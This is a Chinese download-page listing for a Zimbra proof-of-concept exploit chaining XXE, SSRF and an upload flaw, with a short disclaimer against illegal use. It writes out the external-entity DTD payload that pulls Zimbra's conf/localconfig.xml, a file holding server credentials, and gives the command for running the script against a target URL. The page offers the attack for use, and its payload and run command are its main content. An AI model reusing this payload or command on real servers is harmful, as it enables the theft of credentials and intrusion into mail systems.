zimbra_poc:Zimbra XXE + SSRF + UPC Poc 源码
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> 使用方法: python zimbra_poc.py https://target.com POC验证验证使用,不要用于非法用途。 参考资料
文件列表
zimbra_poc-master.zip
(预估有个2文件)
zimbra_poc-master
zimbra.py
3KB
README.md
1KB
暂无评论